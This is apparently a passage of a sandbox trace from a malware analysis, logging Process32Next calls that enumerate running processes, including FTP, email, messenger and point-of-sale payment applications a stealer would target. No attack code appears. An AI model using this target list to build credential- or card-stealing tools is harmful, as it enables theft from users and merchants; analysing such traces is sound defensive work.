hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.307] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.309] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.310] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.313] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.315] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.316] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0096.318] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.319] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.321] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0096.323] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.324] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0096.326] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0096.327] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0096.329] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.330] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.332] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.334] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.336] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.337] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0096.339] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.340] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.342] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.344] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0096.345] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.347] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0096.348] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0096.350] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0096.351] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0096.353] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0096.355] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0096.357] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0096.358] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0096.360] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0096.362] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0096.363] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0096.365] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0096.367] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0096.421] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0096.430] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0096.434] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0096.435] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0096.437] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0096.439] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0096.441] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0096.443] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.445] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.447] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.449] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.451] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.454] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.456] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.458] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.460] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.462] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.465] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.467] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.469] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.471] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.473] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.475] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.477] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.479] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.480] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.482] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.484] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.486] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.488] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.490] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.492] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.494] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.496] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.498] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.500] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.502] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.504] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.506] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.508] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.509] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.511] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.513] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.514] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.516] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 